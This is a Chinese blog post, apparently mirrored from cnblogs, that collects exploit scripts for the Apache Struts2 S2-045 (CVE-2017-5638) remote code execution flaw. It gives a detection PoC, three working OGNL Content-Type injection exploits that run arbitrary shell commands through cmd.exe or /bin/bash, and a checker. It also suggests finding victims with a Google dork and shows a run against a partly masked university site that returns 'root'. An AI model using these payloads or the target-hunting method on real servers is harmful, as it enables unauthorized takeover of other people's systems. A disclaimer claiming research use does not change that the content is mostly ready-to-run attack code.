zoukankan      html  css  js  c++  java
  • S2-045漏洞利用脚本汇总

    申明:本文所介绍的脚本和方法均来自互联网,收集的目的仅供安全研究使用,网站运维人员可以使用本文介绍的脚本和方法评估自身网站的安全性,并尽快发现和修复网站存在的漏洞。对于使用本文脚本和方法所造成的任何后果,由使用者自行承担,作者不承担任何后果。

    S2-045漏洞为一个远程RCE漏洞,利用该漏洞不需要任何的前提条件,因此危害巨大,估计又会造成一场腥风血雨。

    漏洞POC如下:

    import requests
    import sys
     
    def poc(url):
        payload = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(102*102*102*99)).(#ros.flush())}"
        headers = {}
        headers["Content-Type"] = payload
        r = requests.get(url, headers=headers)
        if "105059592" in r.content:
            return True
        return False
    if __name__ == '__main__':
        if len(sys.argv) == 1:
            print "python s2-045.py target"
            sys.exit()
        if poc(sys.argv[1]):
            print "vulnerable"
        else:
            print "not vulnerable"

    利用代码1

    目前一个主要的漏洞利用EXP如下:

    #!/usr/bin/python
    # -*- coding: utf-8 -*-
    
    import urllib2
    import httplib
    
    
    def exploit(url, cmd):
        payload = "%{(#_='multipart/form-data')."
        payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
        payload += "(#_memberAccess?"
        payload += "(#_memberAccess=#dm):"
        payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
        payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
        payload += "(#ognlUtil.getExcludedPackageNames().clear())."
        payload += "(#ognlUtil.getExcludedClasses().clear())."
        payload += "(#context.setMemberAccess(#dm))))."
        payload += "(#cmd='%s')." % cmd
        payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
        payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
        payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
        payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
        payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
        payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
        payload += "(#ros.flush())}"
    
        try:
            headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
            request = urllib2.Request(url, headers=headers)
            page = urllib2.urlopen(request).read()
        except httplib.IncompleteRead, e:
            page = e.partial
    
        print(page)
        return page
    
    
    if __name__ == '__main__':
        import sys
        if len(sys.argv) != 3:
            print("[*] struts2_S2-045.py <url> <cmd>")
        else:
            print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')
            url = sys.argv[1]
            cmd = sys.argv[2]
            print("[*] cmd: %s
    " % cmd)
            exploit(url, cmd)

    怎样寻找目标?太简单了,用google hacking。在搜索引擎中寻找目标很简单:inurl .action

    目测目前80%以上的网站还没有升级,因此找到的目标一测一个准:

    root@kali64:/home/pentest# ./s2-045.py http://www.****.edu.cn/graduate.action "whoami"
    [*] CVE: 2017-5638 - Apache Struts2 S2-045
    [*] cmd: whoami
    
    root

    广大的网站管理员们尽快行动起来吧,估计很多网站都已经被拿下了,如果目前你的网站还没有被拿下,那么不需要恭喜你,因为那是你的网站价值不够高 :)))

    利用脚本2

    #! /usr/bin/env python
    # encoding:utf-8
    import urllib2
    import sys
    from poster.encode import multipart_encode
    from poster.streaminghttp import register_openers
    def poc():
        register_openers()
        datagen, header = multipart_encode({"image1": open("tmp.txt", "rb")})
        header["User-Agent"]="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
        header["Content-Type"]="%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ifconfig').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
        request = urllib2.Request(str(sys.argv[1]),datagen,headers=header)
        response = urllib2.urlopen(request)
        print response.read()
    poc()

     利用脚本3

    #encoding:utf-8
    
    import urllib2
    
    from poster.encode import multipart_encode
    
    from poster.streaminghttp import register_openers
    
    def poc(w_url):
    
        cmd = raw_input('command  
    ')
    
        register_openers()
    
        datagen, header = multipart_encode({"image1": '23333'})
    
        header[
    
            "User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
    
        header[
    
            "Content-Type"] = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='" + cmd + "').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
    
        request = urllib2.Request(w_url, datagen, headers=header)
    
        response = urllib2.urlopen(request).read()
    
        print(response)
    
    if __name__=='__main__':
    
        print 'blog :  http://www.cuijianxiong.com'
    
        w_url = raw_input('addrs : 
    ')
    
        is_shutdown = 1
    
        while is_shutdown == 1:
    
            poc(w_url)

     利用代码4

    #!/usr/bin/env python
    #coding:utf8
    #code by fuck@0day5.com
    import sys
    import requests
    requests.packages.urllib3.disable_warnings()
     
    def poccheck(url):
        result = False
        header = {
            'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
            'Content-Type':"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#o=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#o.println(88888888-23333+1222)).(#o.close())}"
        }
        try:
            response = requests.post(url,data='',headers=header,verify=False,allow_redirects = False)
            if response.content.find("88866777")!=-1:
                result = url+" find struts2-45"
        except Exception as e:
            print str(e)
            pass
        return result
     
    if __name__ == '__main__':
        if len(sys.argv) == 2:
            print poccheck(sys.argv[1])
            sys.exit(0)
        else:
            print ("usage: %s http://www.baidu.com/vuln.action" % sys.argv[0])
            sys.exit(-1)
  • 相关阅读:
    Android开发学习——应用安装过程
    飞信接口
    sql联合查询
    宽度自适应
    数据绑定
    分页查询sql
    asp.net读取文件
    oracle数据库连接
    oracle服务的开始和关闭 CMD
    css导航条
  • 原文地址:https://www.cnblogs.com/gsharpsh00ter/p/6517952.html
Copyright © 2011-2022 走看看